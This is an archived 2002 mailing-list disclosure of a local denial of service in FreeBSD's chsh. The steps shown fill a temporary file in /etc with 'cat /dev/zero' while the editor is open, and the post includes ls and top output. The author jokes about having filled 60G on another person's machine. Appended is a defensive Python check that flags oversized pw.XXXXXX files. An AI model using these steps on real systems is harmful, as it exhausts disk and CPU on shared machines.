Message-ID: <20020815190038.GC416@bokeoa.com>
From: core at bokeoa.com (Charles Stevenson)
Subject: FBSD chsh DoS

I found an interesting couple of related DoS to do against chsh on
FBSD. Basically chsh creates a temporary file in /etc and then
launches a user-defined EDITOR. Anyways I couldn't find a way to
exploit it but I did find a way to be annoying.

    tty1$ chsh

Even if you just launch vi you can get the name of the temporary file
it created in /etc or just do ls.

    > ls -l /etc/pw.a1MwaM
    -rw------- 1 core core 330088448 Aug 15 01:44 /etc/pw.a1MwaM

Er that's after I was being annoying hehehe... filled 60G on phased
machine. Sorry phased! :D

    tty2$ cat /dev/zero > /etc/pw.a1MwaM

Then go back to your vi session in chsh and :wq!... The results are
that basically root can't even remove the file while it's being
written to and of course lots of cpu overload abounds. Anyways quotas
will stop this but how many admins put user quotas on filesystems that
users aren't supposed to be writing to?

  PID USERNAME PRI NICE  SIZE   RES STATE    TIME   WCPU    CPU COMMAND
14139 core      55    0 1140K  612K RUN     12:55 90.23% 90.23% chsh
14171 core      30    0 1912K  976K RUN      0:01  7.81%  2.83% top
13083 root       2    0  356K    0K nfsd     3:00  0.00%  0.00% nfsd

peace,
core
--
Charles Stevenson (core) <core@...eoa.com>
Lab Assistant, College of Eastern Utah San Juan Campus
http://www.bokeoa.com/~core/core.asc
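
Added example, not part of the original post: a defender-side check for the condition described above, a chsh temporary file in /etc growing far beyond the size of a passwd record. The pw.XXXXXX name pattern (inferred from the one file name shown), the 64 KiB threshold and the function names are assumptions; the sample directory is constructed.

```python
import os
import re
import stat
import tempfile

# Name shape inferred from the one file shown in the post (/etc/pw.a1MwaM):
# "pw." plus six alphanumerics. This is an assumption; adjust if needed.
PW_TMP = re.compile(r"^pw\.[A-Za-z0-9]{6}$")


def find_oversized_pw_tmp(directory="/etc", max_bytes=64 * 1024):
    """Return (path, owner_uid, size) for pw.XXXXXX regular files above max_bytes.

    max_bytes is an assumed threshold: one user's passwd record is a few
    hundred bytes, so a temp file near this size is not an edit session.
    """
    findings = []
    with os.scandir(directory) as entries:
        for entry in entries:
            if not PW_TMP.match(entry.name):
                continue
            st = entry.stat(follow_symlinks=False)  # do not follow a planted symlink
            if stat.S_ISREG(st.st_mode) and st.st_size > max_bytes:
                findings.append((entry.path, st.st_uid, st.st_size))
    # Largest first, so the file eating the filesystem is at the top.
    return sorted(findings, key=lambda f: f[2], reverse=True)


def build_sample_dir():
    """Constructed stand-in for /etc so the check runs offline and unprivileged."""
    d = tempfile.mkdtemp(prefix="etc-sample-")
    samples = {
        "pw.a1MwaM": 200 * 1024,  # flooded temp file, name as in the post
        "pw.Zq3LkP": 300,         # ordinary edit session (constructed name)
        "passwd": 500 * 1024,     # large, but not a chsh temp file
    }
    for name, size in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(b"\0" * size)
    return d


if __name__ == "__main__":
    for path, uid, size in find_oversized_pw_tmp(build_sample_dir()):
        print(f"{path} uid={uid} size={size}")
```

The returned owner uid identifies which account's chsh session to look at; run from cron against /etc, the check complements the quotas mentioned in the post.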